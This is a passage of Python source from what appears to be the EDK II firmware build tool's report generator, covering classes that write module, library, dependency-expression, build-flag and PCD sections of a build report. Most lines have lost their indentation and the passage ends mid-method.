gModuleSizePattern = re.compile(r"MODULE_SIZE = (\d+)")
gTimeStampPattern = re.compile(r"TIME_STAMP = (\d+)")
## Pattern to find GUID value in flash description files
gPcdGuidPattern = re.compile(r"PCD\((\w+)[.](\w+)\)")
## Pattern to collect offset, GUID value pair in the flash report intermediate file
gOffsetGuidPattern = re.compile(r"(0x[0-9A-Fa-f]+) ([-A-Fa-f0-9]+)")
## Pattern to find module base address and entry point in fixed flash map file
gModulePattern = r"\n[-\w]+\s*\(([^,]+),\s*BaseAddress=%(Address)s,\s*EntryPoint=%(Address)s\)\s*\(GUID=([-0-9A-Fa-f]+)[^)]*\)"
gMapFileItemPattern = re.compile(gModulePattern % {"Address" : "(-?0[xX][0-9A-Fa-f]+)"})
## Pattern to find all module referenced header files in source files
gIncludePattern = re.compile(r'#include\s*["<]([^">]+)[">]')
gIncludePattern2 = re.compile(r"#include\s+EFI_([A-Z_]+)\s*[(]\s*(\w+)\s*[)]")
## Pattern to find the entry point for EDK module using EDKII Glue library
gGlueLibEntryPoint = re.compile(r"__EDKII_GLUE_MODULE_ENTRY_POINT__\s*=\s*(\w+)")
## Tags for MaxLength of line in report
gLineMaxLength = 120
## Tags for end of line in report
gEndOfLine = "\r\n"
## Tags for section start, end and separator
gSectionStart = ">" + "=" * (gLineMaxLength - 2) + "<"
gSectionEnd = "<" + "=" * (gLineMaxLength - 2) + ">" + "\n"
gSectionSep = "=" * gLineMaxLength
## Tags for subsection start, end and separator
gSubSectionStart = ">" + "-" * (gLineMaxLength - 2) + "<"
gSubSectionEnd = "<" + "-" * (gLineMaxLength - 2) + ">"
gSubSectionSep = "-" * gLineMaxLength
## The look up table to map PCD type to pair of report display type and DEC type
gPcdTypeMap = {
TAB_PCDS_FIXED_AT_BUILD : ('FIXED', TAB_PCDS_FIXED_AT_BUILD),
TAB_PCDS_PATCHABLE_IN_MODULE: ('PATCH', TAB_PCDS_PATCHABLE_IN_MODULE),
TAB_PCDS_FEATURE_FLAG : ('FLAG', TAB_PCDS_FEATURE_FLAG),
TAB_PCDS_DYNAMIC : ('DYN', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_HII : ('DYNHII', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_VPD : ('DYNVPD', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_EX : ('DEX', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_HII : ('DEXHII', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_VPD : ('DEXVPD', TAB_PCDS_DYNAMIC_EX),
}
## The look up table to map module type to driver type
gDriverTypeMap = {
SUP_MODULE_SEC : '0x3 (SECURITY_CORE)',
SUP_MODULE_PEI_CORE : '0x4 (PEI_CORE)',
SUP_MODULE_PEIM : '0x6 (PEIM)',
SUP_MODULE_DXE_CORE : '0x5 (DXE_CORE)',
SUP_MODULE_DXE_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SAL_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SMM_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_RUNTIME_DRIVER: '0x7 (DRIVER)',
SUP_MODULE_UEFI_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_UEFI_APPLICATION : '0x9 (APPLICATION)',
SUP_MODULE_SMM_CORE : '0xD (SMM_CORE)',
'SMM_DRIVER' : '0xA (SMM)', # Extension of module type to support PI 1.1 SMM drivers
SUP_MODULE_MM_STANDALONE : '0xE (MM_STANDALONE)',
SUP_MODULE_MM_CORE_STANDALONE : '0xF (MM_CORE_STANDALONE)'
}
## The look-up table of the supported opcodes in the dependency expression binaries
gOpCodeList = ["BEFORE", "AFTER", "PUSH", "AND", "OR", "NOT", "TRUE", "FALSE", "END", "SOR"]
## Save VPD Pcd
VPDPcdList = []
##
# Writes a string to the report buffer.
#
# This function appends a string to the report buffer, followed by a new line.
# It may optionally wrap the string for better readability.
#
# @File The report buffer (a list of lines) to append to
# @String The string to be written
# @Wrapper Indicates whether to wrap the string
#
def FileWrite(File, String, Wrapper=False):
if Wrapper:
String = textwrap.fill(String, 120)
File.append(String + gEndOfLine)
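# Hedged usage sketch: throughout this module the File argument is a plain list
# used as a line buffer, so FileWrite simply appends "<text>\r\n" entries that
# are joined and written out later. The buffer name below is illustrative only.
def _example_file_write():
    ReportLines = []
    FileWrite(ReportLines, "Module Summary")
    FileWrite(ReportLines, "A deliberately long line " * 10, Wrapper=True)
    return "".join(ReportLines)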
def ByteArrayForamt(Value):
IsByteArray = False
SplitNum = 16
ArrayList = []
if Value.startswith('{') and Value.endswith('}') and not Value.startswith("{CODE("):
Value = Value[1:-1]
ValueList = Value.split(',')
if len(ValueList) >= SplitNum:
IsByteArray = True
if IsByteArray:
if ValueList:
Len = len(ValueList) // SplitNum
for i, element in enumerate(ValueList):
ValueList[i] = '0x%02X' % int(element.strip(), 16)
if Len:
Id = 0
while (Id <= Len):
End = min(SplitNum*(Id+1), len(ValueList))
Str = ','.join(ValueList[SplitNum*Id : End])
if End == len(ValueList):
Str += '}'
ArrayList.append(Str)
break
else:
Str += ','
ArrayList.append(Str)
Id += 1
else:
ArrayList = [Value + '}']
return IsByteArray, ArrayList
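# Hedged usage sketch of ByteArrayForamt: values shaped like "{0x1, 0x2, ...}"
# with at least 16 elements are reformatted into chunks of up to 16 bytes per
# line; otherwise IsByteArray is False and callers keep using the raw value.
def _example_byte_array_format():
    Value = "{" + ",".join("0x%02X" % i for i in range(20)) + "}"
    IsByteArray, ArrayList = ByteArrayForamt(Value)
    # IsByteArray is True here; ArrayList holds two chunks of at most 16 bytes
    # each, and the last chunk is closed with '}'.
    return IsByteArray, ArrayList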
##
# Find all the header files that the module source directly includes.
#
# This function scans source code to find all header files the module may
# include. This is not exact, but it is very effective at finding the header
# files a module includes via #include statements.
#
# @Source The source file name
# @IncludePathList The list of include path to find the source file.
# @IncludeFiles The dictionary of current found include files.
#
def FindIncludeFiles(Source, IncludePathList, IncludeFiles):
FileContents = open(Source).read()
#
# Find header files with pattern #include "XXX.h" or #include <XXX.h>
#
for Match in gIncludePattern.finditer(FileContents):
FileName = Match.group(1).strip()
for Dir in [os.path.dirname(Source)] + IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
#
# Find header files with pattern like #include EFI_PPI_CONSUMER(XXX)
#
for Match in gIncludePattern2.finditer(FileContents):
Key = Match.group(2)
Type = Match.group(1)
if "ARCH_PROTOCOL" in Type:
FileName = "ArchProtocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PROTOCOL" in Type:
FileName = "Protocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PPI" in Type:
FileName = "Ppi/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif TAB_GUID in Type:
FileName = "Guid/%(Key)s/%(Key)s.h" % {"Key" : Key}
else:
continue
for Dir in IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
## Split the lines in a file
#
# This method splits the lines in a file so that each line is no longer
# than MaxLength.
#
# @param Content The content of file
# @param MaxLength The Max Length of the line
#
def FileLinesSplit(Content=None, MaxLength=None):
ContentList = Content.split(TAB_LINE_BREAK)
NewContent = ''
NewContentList = []
for Line in ContentList:
while len(Line.rstrip()) > MaxLength:
LineSpaceIndex = Line.rfind(TAB_SPACE_SPLIT, 0, MaxLength)
LineSlashIndex = Line.rfind(TAB_SLASH, 0, MaxLength)
LineBackSlashIndex = Line.rfind(TAB_BACK_SLASH, 0, MaxLength)
if max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex) > 0:
LineBreakIndex = max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex)
else:
LineBreakIndex = MaxLength
NewContentList.append(Line[:LineBreakIndex])
Line = Line[LineBreakIndex:]
if Line:
NewContentList.append(Line)
for NewLine in NewContentList:
NewContent += NewLine + TAB_LINE_BREAK
NewContent = NewContent.replace(gEndOfLine, TAB_LINE_BREAK).replace('\r\r\n', gEndOfLine)
return NewContent
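# Hedged usage sketch of FileLinesSplit: lines longer than MaxLength are broken
# at the last space, '/' or '\' before the limit (or hard-wrapped if none is
# found) and re-joined with line breaks. The sample line below is invented.
def _example_file_lines_split():
    LongLine = "token " * 40                  # roughly 240 characters
    return FileLinesSplit(LongLine, gLineMaxLength)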
##
# Parse binary dependency expression section
#
# This utility class parses the dependency expression section and translates
# GUID values into their readable names.
#
class DepexParser(object):
##
# Constructor function for class DepexParser
#
# This constructor function collects GUID values so that readable
# GUID names can be translated.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._GuidDb = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for Protocol in Package.Protocols:
GuidValue = GuidStructureStringToGuidString(Package.Protocols[Protocol])
self._GuidDb[GuidValue.upper()] = Protocol
for Ppi in Package.Ppis:
GuidValue = GuidStructureStringToGuidString(Package.Ppis[Ppi])
self._GuidDb[GuidValue.upper()] = Ppi
for Guid in Package.Guids:
GuidValue = GuidStructureStringToGuidString(Package.Guids[Guid])
self._GuidDb[GuidValue.upper()] = Guid
for Ma in Pa.ModuleAutoGenList:
for Pcd in Ma.FixedVoidTypePcds:
PcdValue = Ma.FixedVoidTypePcds[Pcd]
if len(PcdValue.split(',')) == 16:
GuidValue = GuidStructureByteArrayToGuidString(PcdValue)
self._GuidDb[GuidValue.upper()] = Pcd
##
# Parse the binary dependency expression files.
#
# This function parses the binary dependency expression file and translates it
# into an instruction list.
#
# @param self The object pointer
# @param DepexFileName The file name of binary dependency expression file.
#
def ParseDepexFile(self, DepexFileName):
DepexFile = open(DepexFileName, "rb")
DepexStatement = []
OpCode = DepexFile.read(1)
while OpCode:
Statement = gOpCodeList[struct.unpack("B", OpCode)[0]]
if Statement in ["BEFORE", "AFTER", "PUSH"]:
GuidValue = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" % \
struct.unpack(PACK_PATTERN_GUID, DepexFile.read(16))
GuidString = self._GuidDb.get(GuidValue, GuidValue)
Statement = "%s %s" % (Statement, GuidString)
DepexStatement.append(Statement)
OpCode = DepexFile.read(1)
return DepexStatement
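# Hedged usage sketch (not part of the build tool): ParseDepexFile reads one
# opcode byte at a time and, for PUSH/BEFORE/AFTER, consumes a 16-byte GUID.
# The sketch writes a tiny synthetic depex file (PUSH <guid> END) and decodes
# it with a stand-in parser whose GUID database is empty, so the raw GUID value
# is returned instead of a readable name. A real DepexParser needs a workspace
# object (Wa) to populate _GuidDb; the file name below is illustrative only.
def _example_parse_depex(TmpFileName="example.depex"):
    import uuid
    with open(TmpFileName, "wb") as DepexFile:
        DepexFile.write(struct.pack("B", gOpCodeList.index("PUSH")))
        DepexFile.write(uuid.uuid4().bytes_le)    # any 16-byte GUID
        DepexFile.write(struct.pack("B", gOpCodeList.index("END")))
    class _StubParser(object):
        _GuidDb = {}                              # no readable names known
    return DepexParser.ParseDepexFile(_StubParser(), TmpFileName)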
##
# Reports library information
#
# This class reports the module library subsection in the build report file.
#
class LibraryReport(object):
##
# Constructor function for class LibraryReport
#
# This constructor function generates LibraryReport object for
# a module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.LibraryList = []
for Lib in M.DependentLibraryList:
LibInfPath = str(Lib)
LibClassList = Lib.LibraryClass[0].LibraryClass
LibConstructorList = Lib.ConstructorList
LibDesstructorList = Lib.DestructorList
LibDepexList = Lib.DepexExpression[M.Arch, M.ModuleType]
# Default when no matching LibraryAutoGen provides a build time
LibTime = ''
for LibAutoGen in M.LibraryAutoGenList:
if LibInfPath == LibAutoGen.MetaFile.Path:
LibTime = LibAutoGen.BuildTime
break
self.LibraryList.append((LibInfPath, LibClassList, LibConstructorList, LibDesstructorList, LibDepexList, LibTime))
##
# Generate report for module library information
#
# This function generates report for the module library.
# If the module is an EDKII-style one, the additional library class, library
# constructor/destructor and dependency expression may also be reported.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if len(self.LibraryList) > 0:
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_LIBRARY)
FileWrite(File, gSubSectionSep)
for LibraryItem in self.LibraryList:
LibInfPath = LibraryItem[0]
FileWrite(File, LibInfPath)
LibClass = LibraryItem[1]
EdkIILibInfo = ""
LibConstructor = " ".join(LibraryItem[2])
if LibConstructor:
EdkIILibInfo += " C = " + LibConstructor
LibDestructor = " ".join(LibraryItem[3])
if LibDestructor:
EdkIILibInfo += " D = " + LibDestructor
LibDepex = " ".join(LibraryItem[4])
if LibDepex:
EdkIILibInfo += " Depex = " + LibDepex
if LibraryItem[5]:
EdkIILibInfo += " Time = " + LibraryItem[5]
if EdkIILibInfo:
FileWrite(File, "{%s: %s}" % (LibClass, EdkIILibInfo))
else:
FileWrite(File, "{%s}" % LibClass)
FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module dependency expression subsection in the build report file.
#
class DepexReport(object):
##
# Constructor function for class DepexReport
#
# This constructor function generates a DepexReport object for
# a module. If the module source contains a DXS file (usually an EDK-style
# module), it uses the dependency in the DXS file; otherwise, it uses the
# dependency expression from its own INF [Depex] section and then merges it
# with the ones from its dependent libraries' INF files.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.Depex = ""
self._DepexFileName = os.path.join(M.BuildDir, "OUTPUT", M.Module.BaseName + ".depex")
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
if ModuleType in [SUP_MODULE_SEC, SUP_MODULE_PEI_CORE, SUP_MODULE_DXE_CORE, SUP_MODULE_SMM_CORE, SUP_MODULE_MM_CORE_STANDALONE, SUP_MODULE_UEFI_APPLICATION]:
return
for Source in M.SourceFileList:
if os.path.splitext(Source.Path)[1].lower() == ".dxs":
Match = gDxsDependencyPattern.search(open(Source.Path).read())
if Match:
self.Depex = Match.group(1).strip()
self.Source = "DXS"
break
else:
self.Depex = M.DepexExpressionDict.get(M.ModuleType, "")
self.ModuleDepex = " ".join(M.Module.DepexExpression[M.Arch, M.ModuleType])
if not self.ModuleDepex:
self.ModuleDepex = "(None)"
LibDepexList = []
for Lib in M.DependentLibraryList:
LibDepex = " ".join(Lib.DepexExpression[M.Arch, M.ModuleType]).strip()
if LibDepex != "":
LibDepexList.append("(" + LibDepex + ")")
self.LibraryDepex = " AND ".join(LibDepexList)
if not self.LibraryDepex:
self.LibraryDepex = "(None)"
self.Source = "INF"
##
# Generate report for module dependency expression information
#
# This function generates report for the module dependency expression.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalDepexParser The platform global Dependency expression parser object
#
def GenerateReport(self, File, GlobalDepexParser):
if not self.Depex:
return
FileWrite(File, gSubSectionStart)
if os.path.isfile(self._DepexFileName):
try:
DepexStatements = GlobalDepexParser.ParseDepexFile(self._DepexFileName)
FileWrite(File, "Final Dependency Expression (DEPEX) Instructions")
for DepexStatement in DepexStatements:
FileWrite(File, " %s" % DepexStatement)
FileWrite(File, gSubSectionSep)
except:
EdkLogger.warn(None, "Dependency expression file is corrupted", self._DepexFileName)
FileWrite(File, "Dependency Expression (DEPEX) from %s" % self.Source)
if self.Source == "INF":
FileWrite(File, self.Depex, True)
FileWrite(File, gSubSectionSep)
FileWrite(File, "From Module INF: %s" % self.ModuleDepex, True)
FileWrite(File, "From Library INF: %s" % self.LibraryDepex, True)
else:
FileWrite(File, self.Depex)
FileWrite(File, gSubSectionEnd)
##
# Reports build flags information
#
# This class reports the module build flags subsection in the build report file.
#
class BuildFlagsReport(object):
##
# Constructor function for class BuildFlagsReport
#
# This constructor function generates BuildFlagsReport object for
# a module. It reports the build tool chain tag and all relevant
# build flags to build the module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
BuildOptions = {}
#
# Add build flags according to source file extension so that
# irrelevant ones can be filtered out.
#
for Source in M.SourceFileList:
Ext = os.path.splitext(Source.File)[1].lower()
if Ext in [".c", ".cc", ".cpp"]:
BuildOptions["CC"] = 1
elif Ext in [".s", ".asm"]:
BuildOptions["PP"] = 1
BuildOptions["ASM"] = 1
elif Ext in [".vfr"]:
BuildOptions["VFRPP"] = 1
BuildOptions["VFR"] = 1
elif Ext in [".dxs"]:
BuildOptions["APP"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asl"]:
BuildOptions["ASLPP"] = 1
BuildOptions["ASL"] = 1
elif Ext in [".aslc"]:
BuildOptions["ASLCC"] = 1
BuildOptions["ASLDLINK"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asm16"]:
BuildOptions["ASMLINK"] = 1
BuildOptions["SLINK"] = 1
BuildOptions["DLINK"] = 1
#
# Save module build flags.
#
self.ToolChainTag = M.ToolChain
self.BuildFlags = {}
for Tool in BuildOptions:
self.BuildFlags[Tool + "_FLAGS"] = M.BuildOption.get(Tool, {}).get("FLAGS", "")
##
# Generate report for module build flags information
#
# This function generates the report for the module build flags.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSubSectionStart)
FileWrite(File, "Build Flags")
FileWrite(File, "Tool Chain Tag: %s" % self.ToolChainTag)
for Tool in self.BuildFlags:
FileWrite(File, gSubSectionSep)
FileWrite(File, "%s = %s" % (Tool, self.BuildFlags[Tool]), True)
FileWrite(File, gSubSectionEnd)
##
# Reports individual module information
#
# This class reports the module section in the build report file.
# It comprises the module summary, module PCD, library, dependency expression,
# and build flags sections.
#
class ModuleReport(object):
##
# Constructor function for class ModuleReport
#
# This constructor function generates ModuleReport object for
# a separate module in a platform build.
#
# @param self The object pointer
# @param M Module context information
# @param ReportType The kind of report items in the final report file
#
def __init__(self, M, ReportType):
self.ModuleName = M.Module.BaseName
self.ModuleInfPath = M.MetaFile.File
self.FileGuid = M.Guid
self.Size = 0
self.BuildTimeStamp = None
self.Hash = 0
self.DriverType = ""
if not M.IsLibrary:
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
#
# If a module complies with PI 1.1, promote its module type to "SMM_DRIVER"
#
if ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpec = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "0x00010000")
if int(PiSpec, 0) >= 0x0001000A:
ModuleType = "SMM_DRIVER"
self.DriverType = gDriverTypeMap.get(ModuleType, "0x2 (FREE_FORM)")
self.UefiSpecVersion = M.Module.Specification.get("UEFI_SPECIFICATION_VERSION", "")
self.PiSpecVersion = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "")
self.PciDeviceId = M.Module.Defines.get("PCI_DEVICE_ID", "")
self.PciVendorId = M.Module.Defines.get("PCI_VENDOR_ID", "")
self.PciClassCode = M.Module.Defines.get("PCI_CLASS_CODE", "")
self.BuildTime = M.BuildTime
self._BuildDir = M.BuildDir
self.ModulePcdSet = {}
if "PCD" in ReportType:
#
# Collect the set of all PCDs the module uses, referenced directly or
# indirectly by the module INF, and save their module INF default values
# where they exist.
#
for Pcd in M.ModulePcdList + M.LibraryPcdList:
self.ModulePcdSet.setdefault((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Pcd.Type), (Pcd.InfDefaultValue, Pcd.DefaultValue))
self.LibraryReport = None
if "LIBRARY" in ReportType:
self.LibraryReport = LibraryReport(M)
self.DepexReport = None
if "DEPEX" in ReportType:
self.DepexReport = DepexReport(M)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport = BuildFlagsReport(M)
##
# Generate report for module information
#
# This function generates the report for a single module
# in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalPcdReport The platform global PCD report object
# @param GlobalPredictionReport The platform global Prediction report object
# @param GlobalDepexParser The platform global Dependency expression parser object
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, GlobalPcdReport, GlobalPredictionReport, GlobalDepexParser, ReportType):
FileWrite(File, gSectionStart)
FwReportFileName = os.path.join(self._BuildDir, "DEBUG", self.ModuleName + ".txt")
if os.path.isfile(FwReportFileName):
try:
FileContents = open(FwReportFileName).read()
Match = gModuleSizePattern.search(FileContents)
if Match:
self.Size = int(Match.group(1))
Match = gTimeStampPattern.search(FileContents)
if Match:
self.BuildTimeStamp = datetime.utcfromtimestamp(int(Match.group(1)))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FwReportFileName)
if "HASH" in ReportType:
OutputDir = os.path.join(self._BuildDir, "OUTPUT")
DefaultEFIfile = os.path.join(OutputDir, self.ModuleName + ".efi")
if os.path.isfile(DefaultEFIfile):
Tempfile = os.path.join(OutputDir, self.ModuleName + "_hash.tmp")
# rebase the efi image since its base address may not be zero
cmd = ["GenFw", "--rebase", str(0), "-o", Tempfile, DefaultEFIfile]
try:
PopenObject = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
except Exception as X:
EdkLogger.error("GenFw", COMMAND_FAILURE, ExtraData="%s: %s" % (str(X), cmd[0]))
EndOfProcedure = threading.Event()
EndOfProcedure.clear()
if PopenObject.stderr:
StdErrThread = threading.Thread(target=ReadMessage, args=(PopenObject.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
PopenObject.wait()
if PopenObject.stderr:
StdErrThread.join()
if PopenObject.returncode != 0:
EdkLogger.error("GenFw", COMMAND_FAILURE, "Failed to generate firmware hash image for %s" % (DefaultEFIfile))
if os.path.isfile(Tempfile):
self.Hash = hashlib.sha1()
buf = open(Tempfile, 'rb').read()
# hashlib's update() returns None, so feed the buffer once and take the digest
self.Hash.update(buf)
self.Hash = self.Hash.hexdigest()
os.remove(Tempfile)
FileWrite(File, "Module Summary")
FileWrite(File, "Module Name: %s" % self.ModuleName)
FileWrite(File, "Module INF Path: %s" % self.ModuleInfPath)
FileWrite(File, "File GUID: %s" % self.FileGuid)
if self.Size:
FileWrite(File, "Size: 0x%X (%.2fK)" % (self.Size, self.Size / 1024.0))
if self.Hash:
FileWrite(File, "SHA1 HASH: %s *%s" % (self.Hash, self.ModuleName + ".efi"))
if self.BuildTimeStamp:
FileWrite(File, "Build Time Stamp: %s" % self.BuildTimeStamp)
if self.BuildTime:
FileWrite(File, "Module Build Time: %s" % self.BuildTime)
if self.DriverType:
FileWrite(File, "Driver Type: %s" % self.DriverType)
if self.UefiSpecVersion:
FileWrite(File, "UEFI Spec Version: %s" % self.UefiSpecVersion)
if self.PiSpecVersion:
FileWrite(File, "PI Spec Version: %s" % self.PiSpecVersion)
if self.PciDeviceId:
FileWrite(File, "PCI Device ID: %s" % self.PciDeviceId)
if self.PciVendorId:
FileWrite(File, "PCI Vendor ID: %s" % self.PciVendorId)
if self.PciClassCode:
FileWrite(File, "PCI Class Code: %s" % self.PciClassCode)
FileWrite(File, gSectionSep)
if "PCD" in ReportType:
GlobalPcdReport.GenerateReport(File, self.ModulePcdSet)
if "LIBRARY" in ReportType:
self.LibraryReport.GenerateReport(File)
if "DEPEX" in ReportType:
self.DepexReport.GenerateReport(File, GlobalDepexParser)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport.GenerateReport(File)
if "FIXED_ADDRESS" in ReportType and self.FileGuid:
GlobalPredictionReport.GenerateReport(File, self.FileGuid)
FileWrite(File, gSectionEnd)
def ReadMessage(From, To, ExitFlag):
while True:
# read one line at a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != b"":
To(Line.rstrip().decode(encoding='utf-8', errors='ignore'))
else:
break
if ExitFlag.isSet():
break
##
# Reports platform and module PCD information
#
# This class reports the platform PCD section and module PCD subsection
# in the build report file.
#
class PcdReport(object):
##
# Constructor function for class PcdReport
#
# This constructor function generates a PcdReport object for a platform build.
# It collects the whole PCD database from the platform DSC files, the platform
# flash description file and the package DEC files.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self.AllPcds = {}
self.UnusedPcds = {}
self.ConditionalPcds = {}
self.MaxLen = 0
self.Arch = None
if Wa.FdfProfile:
self.FdfPcdSet = Wa.FdfProfile.PcdDict
else:
self.FdfPcdSet = {}
self.DefaultStoreSingle = True
self.SkuSingle = True
if GlobalData.gDefaultStores and len(GlobalData.gDefaultStores) > 1:
self.DefaultStoreSingle = False
if GlobalData.gSkuids and len(GlobalData.gSkuids) > 1:
self.SkuSingle = False
self.ModulePcdOverride = {}
for Pa in Wa.AutoGenObjectList:
self.Arch = Pa.Arch
#
# Collect all platform-referenced PCDs and group them by PCD token space
# GUID C Name
#
for Pcd in Pa.AllPcdList:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
#
# Collect the PCDs defined in the DSC/FDF files but not used in any module
#
UnusedPcdFullList = []
StructPcdDict = GlobalData.gStructurePcd.get(self.Arch, collections.OrderedDict())
for Name, Guid in StructPcdDict:
if (Name, Guid) not in Pa.Platform.Pcds:
Pcd = StructPcdDict[(Name, Guid)]
PcdList = self.AllPcds.setdefault(Guid, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
UnusedPcdFullList.append(Pcd)
for item in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[item]
if not Pcd.Type:
# for a PCD from the FDF file, first check whether it is used in any module
for T in PCD_TYPE_LIST:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(T, [])
if Pcd in PcdList:
Pcd.Type = T
break
if not Pcd.Type:
PcdTypeFlag = False
for package in Pa.PackageList:
for T in PCD_TYPE_LIST:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T) in package.Pcds:
Pcd.Type = T
PcdTypeFlag = True
if not Pcd.DatumType:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T)].DatumType
break
if PcdTypeFlag:
break
if not Pcd.DatumType:
PcdType = Pcd.Type
# Try to remove Hii and Vpd suffix
if PcdType.startswith(TAB_PCDS_DYNAMIC_EX):
PcdType = TAB_PCDS_DYNAMIC_EX
elif PcdType.startswith(TAB_PCDS_DYNAMIC):
PcdType = TAB_PCDS_DYNAMIC
for package in Pa.PackageList:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType) in package.Pcds:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType)].DatumType
break
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
UnusedPcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd in UnusedPcdList:
UnusedPcdList.remove(Pcd)
if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
UnusedPcdFullList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
if GlobalData.gConditionalPcds:
for PcdItem in GlobalData.gConditionalPcds:
if '.' in PcdItem:
(TokenSpaceGuidCName, TokenCName) = PcdItem.split('.')
if (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)]
PcdList = self.ConditionalPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
UnusedPcdList = []
if UnusedPcdFullList:
for Pcd in UnusedPcdFullList:
if Pcd.TokenSpaceGuidCName + '.' + Pcd.TokenCName in GlobalData.gConditionalPcds:
continue
UnusedPcdList.append(Pcd)
for Pcd in UnusedPcdList:
PcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
for Module in Pa.Platform.Modules.values():
#
# Collect module override PCDs
#
for ModulePcd in Module.M.ModulePcdList + Module.M.LibraryPcdList:
TokenCName = ModulePcd.TokenCName
TokenSpaceGuid = ModulePcd.TokenSpaceGuidCName
ModuleDefault = ModulePcd.DefaultValue
ModulePath = os.path.basename(Module.M.MetaFile.File)
self.ModulePcdOverride.setdefault((TokenCName, TokenSpaceGuid), {})[ModulePath] = ModuleDefault
#
# Collect PCD DEC default value.
#
self.DecPcdDefault = {}
self._GuidDict = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
Guids = Package.Guids
self._GuidDict.update(Guids)
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
self.DecPcdDefault.setdefault((TokenCName, TokenSpaceGuidCName, DecType), DecDefaultValue)
#
# Collect PCDs defined in DSC common section
#
self.DscPcdDefault = {}
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DscDefaultValue
if DscDefaultValue:
self.DscPcdDefault[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
def GenerateReport(self, File, ModulePcdSet):
if not ModulePcdSet:
if self.ConditionalPcds:
self.GenerateReportDetail(File, ModulePcdSet, 1)
if self.UnusedPcds:
IsEmpty = True
for Token in self.UnusedPcds:
